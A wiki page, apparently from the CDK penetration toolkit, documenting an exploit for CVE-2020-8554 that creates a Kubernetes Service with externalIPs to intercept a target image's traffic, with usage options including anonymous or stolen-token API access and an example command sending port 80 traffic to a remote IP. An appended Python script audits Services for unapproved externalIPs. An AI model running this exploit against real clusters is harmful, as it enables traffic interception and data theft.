
Evaluate: k8s mitm clusterip

cdxy edited this page Jan 16, 2021 · 5 revisions

Exploit: k8s-mitm-clusterip

Exploit CVE-2020-8554: Man in the middle using ExternalIPs.

K8s man-in-the-middle attack (CVE-2020-8554)

See more at https://unit42.paloaltonetworks.com/cve-2020-8554/

Usage

It first deploys the image in the cluster, then creates a service to hijack its traffic and send it to the remote IP:

cdk run k8s-mitm-clusterip (default|anonymous|<service-account-token-path>) <image> <ip> <port>

Request Options:
default: connect to the API server with the pod's default service account token.
anonymous: connect to the API server as user system:anonymous.
<service-account-token-path>: connect to the API server with a user-specified service account token.

Exploit Options:
image: target image to MITM hijack.
ip: the remote IP that receives the hijacked traffic.
port: send container:PORT traffic to remote IP:PORT.

Example

Deploy the ubuntu image in the cluster and hijack its traffic from port 80 to remote 9.9.9.9:80:

./cdk run k8s-mitm-clusterip default ubuntu 9.9.9.9 80
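
Detection: the Service this exploit creates carries a spec.externalIPs entry, so an audit of that field across all namespaces surfaces it. The following is an added example, not part of CDK or the original page; the sample Service list, the approved range and the function name are constructed assumptions.

```python
import ipaddress
import json

# Constructed sample, shaped like `kubectl get services -A -o json` output.
SAMPLE_SERVICE_LIST = json.dumps({"items": [
    {"metadata": {"namespace": "default", "name": "web"},
     "spec": {"clusterIP": "10.96.0.10", "ports": [{"port": 80}]}},
    {"metadata": {"namespace": "default", "name": "cache"},
     "spec": {"clusterIP": "10.96.0.20", "ports": [{"port": 80}],
              "externalIPs": ["9.9.9.9"]}},
    {"metadata": {"namespace": "ingress", "name": "edge"},
     "spec": {"clusterIP": "10.96.0.30", "ports": [{"port": 443}],
              "externalIPs": ["192.0.2.10"]}},
]})

# Assumption: the only externalIPs range this cluster's operators have approved.
APPROVED_CIDRS = ["192.0.2.0/24"]


def find_unapproved_external_ips(service_list_json, approved_cidrs):
    """Return (namespace, name, external_ip, ports) for every externalIP
    that is outside the allowlist or is not a valid IP address."""
    approved = [ipaddress.ip_network(cidr) for cidr in approved_cidrs]
    findings = []
    for svc in json.loads(service_list_json).get("items", []):
        meta = svc.get("metadata", {})
        spec = svc.get("spec", {})
        ports = [p.get("port") for p in spec.get("ports") or []]
        for raw in spec.get("externalIPs") or []:
            try:
                allowed = any(ipaddress.ip_address(raw) in net for net in approved)
            except ValueError:
                allowed = False  # unparsable value: report it rather than skip
            if not allowed:
                findings.append(
                    (meta.get("namespace"), meta.get("name"), raw, ports))
    return findings


if __name__ == "__main__":
    for ns, name, ip, ports in find_unapproved_external_ips(
            SAMPLE_SERVICE_LIST, APPROVED_CIDRS):
        print(f"REVIEW {ns}/{name}: externalIP {ip} ports {ports}")
```

On a live cluster, pass the output of `kubectl get services -A -o json` in place of the constructed sample.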
